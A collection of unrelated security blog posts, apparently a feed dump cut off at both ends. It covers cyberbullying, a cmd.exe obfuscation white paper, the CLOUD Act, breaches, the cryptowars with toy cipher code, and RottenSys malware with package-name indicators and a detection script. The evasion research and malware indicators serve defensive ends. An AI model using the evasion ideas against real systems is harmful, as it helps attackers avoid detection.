Giving children access to devices and social media before they have the emotional smarts to navigate the online world is another factor. You would be hard-pressed to find a child in Year 5 or 6 at a primary school in any Australian capital city who doesn’t have access to or own a smartphone. And once that phone has been given to your child, it’s impossible to supervise their every move. Within minutes they can join social media platforms (with a little creative licence about their age), enter chat rooms, and view highly disturbing images.

The younger the child, the less likely he or she is to have the emotional intelligence to either navigate tricky situations or make smart decisions online. Perhaps we should all take a lesson from Microsoft co-founder Bill Gates, who made his kids wait until they were 14 before giving them a phone?

How To Minimise The Risk Of Your Child Being Cyberbullied

There are no guarantees in life, but there are certain steps we can take to reduce the chance of our children being impacted by cyberbullying. Here are my top 5 suggestions:

  1. Communicate.
    Establishing a culture where honest, two-way communication is part of the family dynamic is one of the absolute best things you can do. Let your children know they can confide in you, that nothing is off-limits and that you won’t overreact. Then they will be more likely to open up to you about a problem before it becomes insurmountable.
  2. Understand Their World.
    With a deep understanding of your child’s world (their friends, their favourite activities, the movies they see) you’re better equipped to notice when things aren’t swimming along nicely. Establishing relationships with your child’s teachers or year group mentors is another way to keep your ear to the ground. When a child’s behaviour and activity level changes, it could be an indicator that all is not well. So some parental detective work may be required!
  3. Weave Cyber Safety Into Your Family Dialogue.
    We all talk about sun safety and road safety with our children from a young age. But we need to commit to doing the same about cyber safety. Teach your kids never to share passwords, never to give out identifying information of any kind online, and never to respond to online trolls or bullies. This adds a layer of armour that helps shield them from becoming victims of cyberbullying.
  4. Limit Screen Time.
    I know it seems like an ongoing battle but limiting screen time for social media is essential. One of the easiest ways of doing this is by offering them attractive real-life options. Bike rides, beach visits and outings with friends and family are all good ways of redirecting their attention. And make sure their phone/tablet is out of easy reach at night. Yes, it is more effort but it is so worth it. Less time online = less risk!
  5. Teach Your Kids What To Do If They Are Cyberbullied.
    It is essential your kids know what to do if they are being cyberbullied. Blocking the bully is critical, so take some time with your kids to understand the block features on the social networks they use. Collecting evidence is also crucial, so everything should be screenshotted; ensure your child knows how to do this. You can report the cyberbullying incident to the Office of the eSafety Commissioner, which works to have offensive material removed and cyberbullying situations addressed. And why not check out the support offered by your child’s school? It’s important your kids know they have a number of trusted adults in their life they can get help from if things get tough.

So, let’s commit to doing what we can to protect our kids from cyberbullying. Your kids need to know that they can talk to you about anything that is bothering them online – even if it is tough or awkward. Dolly Everett’s final drawing, before she took her life, included the heart-rending caption ‘…speak even if your voice shakes.’ Please encourage your kids to do so.

Alex xx

The post Cyberbullying – How Parents Can Minimize Impact On Kids appeared first on McAfee Blogs.

DOSfuscation: Exploring the Depths of Cmd.exe Obfuscation and Detection Techniques

Skilled attackers continually seek out new attack vectors, while employing evasion techniques to maintain the effectiveness of old vectors, in an ever-changing defensive landscape. Many of these threat actors employ obfuscation frameworks for common scripting languages such as JavaScript and PowerShell to thwart signature-based detections of common offensive tradecraft written in these languages.

However, as defenders' visibility into these popular scripting languages increases through better logging and defensive tooling, some stealthy attackers have shifted their tradecraft to languages that do not support this additional visibility. At a minimum, determined attackers are adding dashes of simple obfuscation to previously detected payloads and commands to break rigid detection rules.

In this DOSfuscation white paper, first presented at Black Hat Asia 2018, I showcase nine months of research into several facets of command line argument obfuscation that affect static and dynamic detection approaches. Beginning with cataloguing a half-dozen characters with significant obfuscation capabilities (only two of which I have identified being used in the wild), I then highlight the static detection evasion capabilities of environment variable substring encoding. Combining these techniques, I unveil four never-before-seen payload obfuscation approaches that are fully compatible with any input command on cmd.exe's command line. These obfuscation capabilities de-obfuscate in the current cmd.exe session for both interactive and noninteractive sessions, and avoid all command line logging. Finally, I discuss the building blocks required for these new encoding and obfuscation capabilities and outline several approaches that defenders can take to begin detecting this genre of obfuscation.

As a Senior Applied Security Researcher with FireEye's Advanced Practices Team, I am tasked with researching, developing and deploying new detection capabilities to FireEye's detection platform to stay ahead of advanced threat actors and their ever-changing tactics, techniques and procedures. FireEye customers have been benefiting from multiple layers of innovative obfuscation detection capabilities developed and deployed over the past nine months as a direct result of this research.

Download the DOSfuscation white paper today.

Daniel Bohannon (@danielhbohannon) is a Senior Applied Security Researcher on FireEye's Advanced Practices Team.

The CLOUD Act: a danger to journalists worldwide

Abdel Fattah el-Sisi (image: Wikimedia Commons)

UPDATE: The Omnibus bill, which included the CLOUD Act, was passed by the Senate on Thursday night and signed into law by President Trump on Friday afternoon.

Congress is on the verge of passing a dangerous bill, known as the Clarifying Lawful Overseas Use of Data Act (“CLOUD Act”), which will have disastrous implications for privacy, as it would allow foreign governments to access private data on American soil while circumventing important privacy protections. In particular, it poses a serious threat to foreign journalists who report on repressive regimes.

Current laws dictate that a foreign prosecutor who wants to access data stored by American companies cannot do so directly, since they lack jurisdiction. Instead, they have to go through the “mutual legal assistance treaty” (MLAT) process—which requires sign off from the Justice Department and an order by a judge in each individual case.

MLATs are agreements between two countries in which each agrees to help the other with criminal investigations. The U.S. has signed MLATs with more than 60 countries.

But under the CLOUD Act, instead of relying on the MLAT process, foreign governments could bypass this system and instead demand data directly from technology companies in the United States if they negotiate a blanket agreement with the executive branch.

This poses a real risk for journalists in repressive regimes who rely on internet services provided by American technology companies. For example, say that a journalist in a country like Egypt uses Gmail, and therefore some of their emails are stored on one of Google’s server farms in the United States. In recent years, Egypt has aggressively cracked down on dissent and put hundreds of journalists in jail on politically-motivated charges of terrorism.

Egypt is a strong U.S. ally, and the country currently has an MLAT with the United States. The CLOUD Act gives the power to certify governments under this act to the Trump administration. Trump has heaped praise on Egypt’s military dictator Abdel Fattah el-Sisi. So would his Justice Department give Egypt a blanket certification to proceed under the CLOUD Act?

If the Trump administration does label Egypt a "qualifying foreign government," then whenever the Egyptian government decides that it wants access to a journalist’s emails stored in the United States in order to prosecute that journalist, it could simply request that Google hand over the emails. The Justice Department does not need to approve each individual request, and neither does a federal judge.

Unless the technology company found a request so egregious that it went to court to contest it, no federal judge would even know about the surveillance demand from a foreign government. Foreign governments would be given the power to wiretap conversations on U.S. soil that might involve U.S. persons.

To make matters worse, Congress has attached the CLOUD Act to this week’s $1.3 trillion Omnibus spending bill that includes allocation of funds to a wide variety of projects, including the border wall. On March 22, the United States House of Representatives passed the Omnibus spending bill. While it still must pass the Senate to become law, because the spending bill touches so many controversial issues, there will likely be no debate and no hearings on the CLOUD Act—despite its significance for the future of press and information freedom.

Proponents of the bill claim the current process is cumbersome and time consuming. It’s true the MLAT process takes time, but that’s for good reason: to ensure due process. It is immeasurably preferable to legislation that would expand law enforcement’s reach across the world.

Writing in Lawfare, Neema Singh Guliana of the ACLU and Naureen Shah of Amnesty International point out the serious problems with the CLOUD Act’s approach:

"In such a situation, the only real fail-safe to prevent a technology company from inadvertently acceding to a harmful data request is the technology company itself. But would even a well-intentioned technology company, particularly a small one, have the expertise and resources to competently assess the risk that a foreign order may pose to a particular human rights activist? Would it know, as in the example above, when to view Turkey’s terrorism charges in a particular case as baseless? In many cases, companies would likely rely on the biased assessments by foreign courts and fulfill requests."

The CLOUD Act has worrying implications not just for everyone's privacy rights, but also for the ability of journalists around the world to protect their data. Urge your representatives to oppose the Omnibus spending bill as long as it includes the dangerous CLOUD Act.

Travel Agency Orbitz Hit with Data Breach, 880,000 Payment Cards Affected

We all love a good getaway, and as we look ahead to spring and summer, most of us are already planning our next vacation. To do that, we’ll tap one of the many online travel agencies out there to help us organize our plans. Only now, some travel-goers may have to stop trip planning so they can start planning for credit monitoring, as one of the most popular travel agencies, Orbitz, was hit with a data breach that may have exposed as many as 880,000 payment cards.

The online travel agency reported two separate data disclosures, as an attacker may have accessed customers’ personal information shared on Orbitz.com and a handful of associated websites between Jan. 1, 2016 and Dec. 22, 2017.

What’s more – in addition to the payment cards, hackers may have also stolen customers’ full name, date of birth, phone number, email address, physical and/or billing address and gender information. Now, with all this personal information potentially out in the open, it’s important affected customers start thinking about protecting their personal identities. To do just that, follow these tips:

  • Regularly review your online account info. Things like regularly reviewing transactions online and making sure account contact info hasn’t changed are good for keeping tabs on anyone trying to hijack your account.
  • Set up an alert. If you know there’s a chance your personal data has been compromised, place a fraud alert on your credit so that any new or recent requests undergo scrutiny. This also entitles you to extra copies of your credit report so you can check for anything suspicious. If you find an account you did not open, report it to the police or Federal Trade Commission, as well as the creditor involved so you can close the fraudulent account.
  • Consider an identity theft protection solution. With this breach and others before it, consumers are faced with the possibility of identity theft. McAfee Identity Theft Protection allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Travel Agency Orbitz Hit with Data Breach, 880,000 Payment Cards Affected appeared first on McAfee Blogs.

Economic Impact of Cybercrime: Why Cyber Espionage isn’t Just the Military’s Problem

In a technology-driven age, entrepreneurs, organizations, and nations succeed or fail in large part based on how effectively they develop, implement, and protect technology. One of the most notable aspects of “The Economic Impact of Cybercrime” report released recently is the prominence of cyber espionage, the cyber-theft of intellectual property (IP) and business confidential information. The report from the Center for Strategic and International Studies (CSIS) and McAfee estimates that the cost of cybercrime to the global economy is around $600 billion annually, or 0.8% of global GDP, and cyber espionage accounts for 25% of that damage, more than any other category of cybercrime. Furthermore, the report argues that “Internet connectivity has opened a vast terrain for cybercrime, and IP theft goes well beyond traditional areas of interest to governments, such as military technologies.”

When we think of cyber espionage, we tend to think of events such as the Chinese military’s theft of the F-35 joint strike fighter’s blueprints from U.S. corporations. Last month, the Associated Press reported a similar event where Russian hackers attacked several U.S. corporations attempting to steal drone technologies used by the U.S. military.

But there are also cases such as the 2009 Operation Aurora attacks, in which nation-state hackers allegedly tied to China’s People’s Liberation Army sought to steal IP and business confidential information from IT, chemical, web services, and manufacturing firms as well as military contractors. There is also the example of the 2004 Nortel Networks cyber-attacks, which allegedly compromised IP later used to strengthen the market position of Chinese telecommunications giant Huawei.

Such examples suggest that nation states are seeking to steal IP not only to enhance their military strength, but also to achieve technological leadership throughout the rest of their economies without the investments, human talent, or other foundational elements associated with technical innovation.

Put simply, cyber espionage isn’t just the U.S. military’s problem. Organizations beyond military contractors should assume they could become targets of such cybercrimes.

If enough of a profit motive is there, it’s wise to assume that the hacking expertise and tools to steal IP are within your would-be attackers’ reach. Furthermore, it’s wise to assume that the beneficiaries of commercial cyber espionage are capable of copying your compromised product designs and building them into their own products, just as Chinese government engineers had integrated stolen F-35 design features into China’s J-20 stealth fighter.

The cyber theft of such IP could result in lost market share and revenues for corporations. Such theft could smother a nation’s most promising new startups in their Series A cradles, or drive its most innovative mid-sized companies out of business, erasing wealth and jobs in the process.

The CSIS report identified three key cyber espionage challenges facing organizations and nations today.

Challenges of Detection

Cyber espionage maintains a lower profile than critical infrastructure attacks, ransomware, mega consumer data hacks, and identity theft and fraud, in part because there’s no incentive to report cyber espionage incidents. Victimized companies don’t wish to report them, if indeed they ever become aware of them. The attackers don’t wish to alert their victims or the public to their crimes. Victim organizations still own the compromised IP or business confidential information, and could easily attribute declines in market share and revenue to any number of tactical and strategic moves by competitors. Unsurprisingly, such incidents go undiscovered and underreported.

Challenges of Attribution

As in every other area of cybersecurity, the difficulty of attribution makes the policing of cyber espionage complicated if not near impossible. Attacks of this nature are sophisticated and designed to obscure the identity of the actors behind them. Governments are in the best position to determine attribution because they can combine the analysis of technical cyber-attack forensics with analysis of traditional intelligence to identify actors. But holding adversaries accountable isn’t easy given the nature of the required inputs and analysis that enable attribution.

For instance, the U.S. government has accused Chinese hackers associated with the People’s Liberation Army (PLA) of being responsible for half of the cyberespionage activity targeting U.S. “IP and commercially valuable information,” and claimed that this activity had inflicted $20 billion in economic damage by 2014.

But the evidence used to make such attribution determinations is not easily exposed without revealing the means and methods by which cyber threat researchers and government agencies came by it.

Challenges of Definition

The CSIS report revisits the 2015 Barack Obama-Xi Jinping Summit, where the leaders of the U.S. and China agreed that their intelligence communities would cease to conduct “commercial espionage,” while allowing each nation to engage in military-related espionage appropriate to their respective national security interests. The nations comprising the world’s 20 largest economies agreed to a similar “no-commercial espionage” pledge later that year.

Any such agreement obviously requires accountability mechanisms to have an impact. But it also requires that the nations agree to specific and consistent definitions of what constitutes commercial versus military espionage.

CSIS notes that the evidence is mixed as to whether the Chinese government has slowed commercial espionage in accordance with the 2015 agreement. But the think tank also observes that, despite high-level dialogues and pledges between nations, officials from multiple countries maintain that commercial IP theft continues unabated.

Last month’s Worldwide Threat Assessment of the U.S. Intelligence Community confirmed that China and other nation-state actors are continuing to use cyber-attacks to “acquire U.S. intellectual property and proprietary information to advance their own economic and national security objectives.”

The assessment goes so far as to suggest that because the disruptive technologies of the 21st century are being developed by public and private competitors around the world, any significant loss of U.S. IP in pivotal areas—artificial intelligence, 5G networking, 3D printing, nano-materials, quantum computing, biotech, and advanced robotics—could ultimately weaken U.S. military and economic power, and result in a loss of national competitiveness in the global marketplace, as well as on the battlefield.

Preventing the Theft of our Future

At its most basic level, the theft of IP and business confidential information is a theft of the future. It’s a theft of future national security, future business for companies, future wealth for a nation’s communities, and future high-paying jobs and standards of living for a nation’s citizens.

Because technologies don’t fit neatly within civilian and military sector silos, particularly throughout their lifecycles, it’s important for organizations to take cyber espionage seriously. Even beyond technology providers, any organization producing something of great value should consider that what it produces is valuable to others as well, and remember that anything of great value must be protected.

Please go here for more information on the report’s assessments.

The post Economic Impact of Cybercrime: Why Cyber Espionage isn’t Just the Military’s Problem appeared first on McAfee Blogs.

Security Champions: a Scalable Approach for Securing DevOps

DevOps and Security Champions

The enormous growth of DevOps is no accident. As organizations attempt to navigate the complexities of digital business, speed and flexibility are everything. Yet somewhere between innovation and disruption lies a basic fact: A DevOps initiative is only as good as the security framework that supports it.

Unfortunately, many organizations focus on speed and precision at the expense of security. The problem, according to a 2017 report from Gartner, is that DevSecOps is about speed and precision, yet security is often seen by development managers as a training burden or blocking issue. As a result, organizations become mired in a “fix it later” mentality.*

Overcoming this hurdle can prove daunting. Tossing money at more security and more training isn't necessarily the answer. A better approach centers on developing security champions who convey security priorities to colleagues. This approach boosts buy-in. It also speeds the feedback loop and helps translate security priorities into secure development practices that span groups and jargon.

Code Red

Establishing a DevSecOps framework is at the center of an agile and flexible enterprise. But putting the concept into motion is easier said than done. For one thing, business leaders must move beyond the perception that security is a roadblock for effective DevOps. When security is successfully integrated into processes and workflows, it creates a more streamlined and secure development environment. For another, they must adopt the right methods and techniques.

Gartner points out: “The use of a security champion grants organizations an individual who can act as an on-site advisor and as an expert who can anticipate potential design or implementation problems early in the development process. Champions can reduce the perceived complexity of secure coding by providing immediate, real-world examples in the team's code and can focus on immediate remediation rather than more abstract, less relatable issues.”*

Moving Beyond DevOps

There are several steps that can help an organization cultivate security champions and make the leap to DevSecOps:*

  • Ask for volunteers.
  • Establish a minimum baseline of what it takes to be qualified as a security champion.
  • Provide training for these basic skills.
  • Set expectations about time commitments.
  • Train team leaders whenever possible.

Please read the report for a fuller description of these topics.

A Winning Approach

While there is no simple or single way to transform DevOps into DevSecOps, security champions can serve as a powerful tool. They can help an organization adopt a best practice approach.

Learn how to take your DevOps program to the next level by cultivating security champions.

Download the Gartner Report


*Gartner - Magic Quadrant for Application Security Testing, Ayal Tirosh, Dionisio Zumerle, Mark Horvath, 19 March 2018

I’m A Tiger – Enterprise Security Weekly #84

This week, John Strand takes the show by the reins and conducts an outstanding interview with Brian Honan, who is recognised internationally as an expert on cybersecurity! John also gives a tech segment on how enterprises defend against attacks! All that and more, here on Enterprise Security Weekly!

Full Show Notes:


What Were the CryptoWars ?

F-Secure invites our fellows to share their expertise and insights. For more posts by Fennel, click here

In a previous article, I mentioned the cryptowars against the US government in the 1990s. Some people let me know that it needed more explanation. Ask and thou shalt receive! Here is a brief history of the 1990s cryptowars and cryptography in general.

Crypto in this case refers to cryptography (not crypto-currencies like BitCoin). Cryptography is a collection of clever ways for you to protect information from prying eyes. It works by transforming the information into unreadable gobbledegook (this process is called encryption). If the cryptography is successful, only you and the people you choose can transform the gobbledegook back to plain English (this process is called decryption).

People have been using cryptography for at least 2500 years. While we normally think of generals and diplomats using cryptography to keep battle and state plans secret, it was in fact used by ordinary people from the start. Mesopotamian merchants used crypto to protect their top secret sauces, lovers in ancient India used crypto to protect their messages, and mystics in ancient Egypt used crypto to keep more personal secrets.

However, until the 1970s, cryptography was not very sophisticated. Even the technically and logistically impressive Enigma machines, used by the Nazis in their repugnant quest for Slavic slaves and Jewish genocide, were just an extreme version of one of the simplest possible encryptions: a substitution cipher. In most cases simple cryptography worked fine, because most messages were time sensitive. Even if you managed to intercept a message, it took time to work out exactly how the message was encrypted and to do the work needed to break that cryptography. By the time you finished, it was too late to use the information.
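
To make the idea concrete, here is a toy substitution cipher of the kind described above, sketched in Python. The key is just an illustrative shuffled alphabet, not anything Enigma actually used:

```python
import string

# The secret: a fixed table mapping each letter to another. Enigma was,
# in effect, an elaborate machine for changing this table with every keypress.
key = "QWERTYUIOPASDFGHJKLZXCVBNM"          # illustrative shuffled alphabet
enc_table = str.maketrans(string.ascii_uppercase, key)
dec_table = str.maketrans(key, string.ascii_uppercase)

def encrypt(text):
    return text.upper().translate(enc_table)

def decrypt(text):
    return text.upper().translate(dec_table)

print(encrypt("ATTACK AT DAWN"))   # -> QZZQEA QZ RQVF
```

Breaking such a cipher is only a matter of letter-frequency analysis, which is why the time sensitivity of messages mattered so much.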

World War II changed the face of cryptography for multiple reasons – the first was the widespread use of radio, which meant mass interception of messages became almost guaranteed instead of a matter of chance and good police work. The second reason was computers. Initially computers meant women sitting in rows doing mind-numbing mathematical calculations. Then later came the start of computers as we know them today, which together made decryption orders of magnitude faster. The third reason was concentrated power and money being applied to surveillance across the major powers (Britain, France, Germany, Russia) leading to the professionalization and huge expansion of all the relatively new spy agencies that we know and fear today.

The result of this huge influx of money and people to the state surveillance systems in the world’s richest countries (i.e. especially the dying British Empire, and then later America’s growing unofficial empire) was a new world where those governments expected to be able to intercept and read everything. For the first time in history, the biggest governments had the technology and the resources to listen to more or less any conversation and break almost any code.

In the 1970s, a new technology came on the scene to challenge this historical anomaly: public key cryptography, invented in secret by British spies at GCHQ and later in public by a growing body of work from American university researchers Merkle, Diffie, Hellman, Rivest, Shamir, and Adleman. All cryptography before this invention relied on algorithm secrecy in some aspect – in other words, the cryptography worked by having a magical secret method known only to you and your friends. If the baddies managed to capture, guess, or work out your method, decrypting your messages became much easier.

This is what is known as “security by obscurity” and it was a serious problem from the 1940s on. To solve this, surveillance agencies worldwide printed thousands and thousands of sheets of paper with random numbers (one-time pads) to be shipped via diplomatic courier to embassies and spies around the world. Public key cryptography changed this: the invention meant that you could share a public key with the whole world, and share the exact details of how the encryption works, but still protect your secrets. Suddenly, you only had to guard your secret key, without ever needing to share it. Suddenly it didn’t matter if someone stole your Enigma machine to see exactly how it works and to copy it. None of that would help your adversary.
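
The public-key idea can be sketched with “textbook” RSA using deliberately tiny primes. Real systems use enormous primes and careful padding, so this is an illustration of the mathematics only, not a usable implementation:

```python
# Toy "textbook RSA": the public key (n, e) can be shared with the whole
# world, while only the private exponent d must be kept secret.
p, q = 61, 53                        # secret primes (absurdly small here)
n = p * q                            # 3233, published as part of the public key
e = 17                               # public exponent
d = pow(e, -1, (p - 1) * (q - 1))    # private exponent: modular inverse of e

def encrypt(m):                      # anyone can do this with the public key
    return pow(m, e, n)

def decrypt(c):                      # only the private-key holder can do this
    return pow(c, d, n)

c = encrypt(42)
print(c, decrypt(c))                 # the round trip recovers 42
```

Notice that publishing `n` and `e`, and even this exact algorithm, does not help an eavesdropper: recovering `d` requires factoring `n`, which is infeasible at real key sizes.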

And because this was all normal mathematical research, it appeared in technical journals, could be printed out and go around the world to be used by anyone. Thus the US and UK governments’ surveillance monopoly was in unexpected danger. So what did they do? They tried to hide the research, and they treated these mathematics research papers as “munitions”. It became illegal to export these “weapons of war” outside the USA without a specific export license from the American government, just like for tanks or military aircraft.

This absurd situation persisted into the early 1990s when two new Internet-age inventions made their continued monopoly on strong cryptography untenable. Almost simultaneously, Zimmermann created a program (PGP) to make public key cryptography easy for normal people to use to protect their email and files, and Netscape created the first SSL protocols for protecting your connection to websites. In both cases, the US government tried to continue to censor and stop these efforts. Zimmermann was under constant legal threat, and Netscape was forced to make an “export-grade” SSL with dramatically weakened security. It was still illegal to download, use, or even see, these programs outside the USA.

But by then the tide had turned. People started setting up mirror websites for the software outside the USA. People started putting copies of the algorithm on their websites as a protest. Or wearing t-shirts with the working code (5 lines of Perl is all that’s needed). Or printing the algorithm on posters to put up around their universities and towns. In the great tradition of civil disobedience against injustice, geeks around the world were daring the governments to stop them, to arrest them. Both the EFF (Electronic Frontier Foundation) and the EPIC (Electronic Privacy Information Center) organizations were created as part of this fight for our basic (digital) civil rights.

In the end, the US government backed down. By the end of the 1990s, the absurd munitions laws still existed but were relaxed sufficiently to allow ordinary people to have basic cryptographic protection online. Now they could be protected when shopping at Amazon without worrying that their credit card and other information would be stolen in transit. Now they could be protected by putting their emails in an opaque envelope instead of sending all their private messages via postcard for anyone to read.

However that wasn’t the end of the story. As in so many cases, “justice too long delayed is justice denied”. Over the last two years the internet has finally been becoming systematically protected by encryption, thanks to the amazing work of LetsEncrypt. But we spent almost 20 years sending most of our browsing and search requests via postcard, and the “export-grade” SSL the American government forced on Netscape in the 1990s is directly responsible for the existence of the DROWN attack, which puts many systems at risk even today.

Meanwhile, thanks to the legal threats, email encryption never took off. We had to wait until the last few years for the idea of protecting everybody’s communications with cryptography to become mainstream with instant messaging applications like Signal. Even with this, the US and UK governments continue to lead the fight to stop or break this basic protection for ordinary citizens, despite the exasperated mockery from everyone who understands how cryptography works.

WiTopia personalVPN review: It’s all about choices

WiTopia personalVPN in brief:

  • P2P allowed: Yes
  • Business location: Reston, VA
  • Number of servers: 300+
  • Number of country locations: 45
  • Cost: $50 (Basic) / $70 (Pro)
  • VPN protocol: OpenVPN (default)
  • Data encryption: AES-128
  • Data authentication: SHA2
  • Handshake encryption: TLSv1.2

I’ve grown to expect certain things from a VPN service: a nice-looking and easy-to-use desktop program, and extra features like double VPNs, dedicated torrent servers, or sometimes Netflix compatibility. PersonalVPN from WiTopia confounds all those expectations a little, but is still a great option to consider.

To read this article in full, please click here

RottenSys Malware Reminds Users to Think Twice Before Buying a Bargain Phone

China is a region that has been targeted with mobile malware for over a decade, as malware authors there are continually looking for new tactics to lure victims. One of the most innovative tactics we have come across in the past several years is to get victims to buy discounted devices from sellers that have compromised the smartphones. And now one of these campaigns, Android.MobilePay (dubbed RottenSys), is making headlines, though McAfee has been aware of it for over two years. The tactic used by the authors and distributors is straightforward: they install fake apps on a device that pretend to provide a critical function but often don’t get used.

RottenSys is stealthy. It doesn’t provide any secure Wi-Fi related service; rather, it is an advanced strain of malware that grabs almost every sensitive Android permission to enable its malicious activities. To avoid detection, RottenSys doesn’t ship with an initial malicious component and doesn’t immediately initiate malicious activity. Instead, it is designed to contact its command-and-control servers to obtain the actual malicious code, which it then installs and executes on the device.

Given that it installs whatever new malicious components its C&C server delivers, RottenSys can be used to weaponize or take full control of millions of infected devices. In fact, the hackers behind RottenSys appear to have already started turning infected devices into a massive botnet.

This attack is an indication of change: over the past two years the mechanics of fraud have adapted. In the past, scams such as this typically used premium SMS fraud to generate revenue, reaching out to a premium number and making small charges that go unnoticed over an extensive period. As described in detail in our Mobile Threat Report: March 2018, we have seen traditional attack vectors such as premium text messages and toll fraud replaced by botnet ad fraud, pay-per-download distribution scams, and crypto-mining malware that can generate millions in revenue.

Long story short – it’s still important to take precautionary steps to avoid infection by this type of malware scheme. The good news is that you can easily check whether your device is infected with RottenSys. Go to Android system settings → App Manager, and then look for the following possible malware package names:

  • android.yellowcalendarz
  • changmi.launcher
  • system.service.zdsgt
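
For the command-line inclined, the same check can be scripted. A minimal sketch in Python, assuming you can capture the output of `adb shell pm list packages` from a connected device (the sample text below stands in for real output):

```python
# Names from the list above; RottenSys components hide behind them.
BAD_PACKAGES = ("android.yellowcalendarz", "changmi.launcher", "system.service.zdsgt")

def find_suspects(pm_output):
    """Return the lines of `pm list packages` output matching a known-bad name."""
    return [line for line in pm_output.splitlines()
            if any(bad in line for bad in BAD_PACKAGES)]

# With a device attached you would capture real output, e.g.:
#   import subprocess
#   pm_output = subprocess.run(["adb", "shell", "pm", "list", "packages"],
#                              capture_output=True, text=True).stdout
sample = "package:com.example.ok\npackage:com.android.yellowcalendarz\n"
print(find_suspects(sample))   # -> ['package:com.android.yellowcalendarz']
```

An empty result from the real device output is a good sign; any hit deserves the removal steps below.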

Beyond that, you can protect your device by following these tips:

  • Buy with security in mind. When looking to purchase your next mobile device, make sure to do a factory reset as soon as you turn it on for the first time.
  • Delete any unnecessary apps. Most mobile providers allow users to delete pre-installed apps. So, if there’s a pre-installed app you don’t use, or seems unknown to you, go ahead and remove it from your device entirely.
  • Always scan your device, even if it’s new. One of the first applications you should load onto a new device is an anti-malware scanner, like McAfee Mobile Security. It can detect and alert users to malicious behavior on their devices. In this case, if a malware variant is detected, new users can see if they can return their infected devices in exchange for a clean one.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post RottenSys Malware Reminds Users to Think Twice Before Buying a Bargain Phone appeared first on McAfee Blogs.

Synthetic Voice |​​ Fraudsters Have Your Data — And Your Voice​

We have reached peak data breach — the number of data breaches and the sensitivity of the information exposed is massive and growing. Unprecedented amounts of data are available on the dark web, and password sharing has run rampant, rendering knowledge-based authentication questions (KBAs) obsolete. And all of these factors impact the state of fraud today.

$14 billion is lost annually to fraud, and 41% of consumers blame the brand when fraud happens. Fraud loss is therefore not only detrimental in monetary terms; it is also a reputation risk.

The call center has been identified as the Achilles’ heel – a point of entry for fraudsters into enterprises. Once an individual is authenticated via the phone channel, the caller can make changes to passwords, account information, and shipping addresses. Additionally, fraudsters can determine which agents are the most susceptible to social engineering and use other fraud vectors to take advantage of the call center, ultimately working towards their goal of financial gain.

To combat fraudsters’ advancements and adaptations, biometric technology has introduced an alternative method of authentication by offering identification through something you are – rather than something you know or have. Voice biometrics are not entirely infallible, though. Their success is largely determined by the strength of underlying machine learning tools, and characterized by how well the technology can establish session variability.

Even though biometric technology offers a stricter layer of security, fraudsters can still take advantage through a variety of techniques, including imitation, voice modification, replay attacks, and voice synthesis. These approaches are typically deterred by state-of-the-art voice biometric engines. However, synthetic voice attacks can bypass many legacy security measures and traditional voice biometrics systems not designed to detect synthetic attacks. With the use of deep learning, a synthetic voice can be created with only a few minutes of genuine speech — which can then be used by fraudsters.

While traditional voice biometric systems can often be fooled by these synthetic voices, most of them wouldn’t get past a human listener. That’s because, when you listen to someone speaking — or a recording of someone speaking — your brain uses your experience, combined with optimistic and skeptical traits, to determine whether or not you should trust that voice. You may not know why you don’t trust a synthetic voice, but you know that it’s not real.

Deep neural networks empower a machine to do what traditional biometrics cannot. Pindrop’s Deep Voice™ biometric engine uses this technology to work like a human brain — encompassing both optimistic and skeptical characteristics — and is capable of identifying synthetic speech. As technology advances to fool human suspicions, technology must also advance to fill that gap. To learn more, watch our on-demand session, “Synthetic Voices are Outsmarting Your Biometric Security.”

The post Synthetic Voice |​​ Fraudsters Have Your Data — And Your Voice​ appeared first on Pindrop.

Podcast: AppSec’s Effect on the Bottom Line

Traditionally, most executives have thought of security as a necessary evil – an investment that was needed solely to avoid a bad outcome, but not something that would bring in new customers or boost revenue. But that seems to be changing. CA Technologies recently surveyed IT and business leaders to find out how well organizations are integrating security throughout the development process – a methodology known as DevSecOps.

The survey results highlight the effect of doing security right on the bottom line: analysis shows a clear correlation between how effectively security is managed in the development cycle and improved revenues and profits.

The research found that organizations that are making progress in the shift toward true DevSecOps outperform those organizations that lag in adoption. These security-minded organizations are:

  • 2.6 times more likely to have security testing keep up with frequent app updates
  • 2.4 times more likely to be leveraging security to enable new business opportunities
  • 2.5 times more likely to be outpacing their competitors
  • Seeing 50 percent higher profit growth and 40 percent higher revenue growth

What’s behind these numbers? Ayman Sayed, president and chief product officer at CA Technologies, recently sat down with Evan Schuman to discuss the results and what they imply. Listen to CA Veracode’s AppSec in Review podcast episode 14 to find out why shifting security left in the development cycle is about more than cost avoidance and how it can affect your bottom line.

EDR – Not just for Large Enterprises?

When you think of Endpoint Detection and Response (EDR) tools, do you envision a CSI-style crime lab with dozens of monitors and people with eagle-eye views of what their users and defenses are doing? For many, the idea of EDR seems like something for “the big players” with teams of highly trained people. That perception is based on the historical products and presentations of these tools in days gone by; however, it’s no longer true.

What Changed?

For starters, threats changed, along with the need to investigate them to prevent a repeat of an outbreak or breach. To put it simply, malware and attack methods became smarter, and stopping them became much more difficult. Threats don’t always look like threats anymore. The same type of attack might arrive through the web or email, as a different file type with a different name, but with the same intent: avoid detection and compromise your endpoints.

Defenses have evolved as well, but that growth brought another problem with it. More defenses mean more reports, more alerts, and more places to go to investigate and then remediate a threat. Economically, most organizations have not put more staff into the mix alongside this change. The “do more with less” mantra hasn’t left the minds of many, and the result is too many security practitioners drowning in noise and overwhelmed by management tools and data. Perhaps that’s why so many resort to simply re-imaging a machine instead of investigating or remediating a threat; it seems easier (and it probably is) for many. See our infographic ‘A Return to Endpoint Protection Platforms’ for more on how the use of disparate point tools increases operational complexity.

Lastly, the need to do things differently arrived. The latest Gartner Market Guide for Endpoint Detection and Response shows a strong shift in the number of organizations that now consider EDR a need and plan to invest in it. Security practitioners are shifting gears as they confront the nature of modern threats and the need to know how they arrived, what they attempted to do, and where else they may have attempted entry.

It Doesn’t Have to Take a Village Anymore

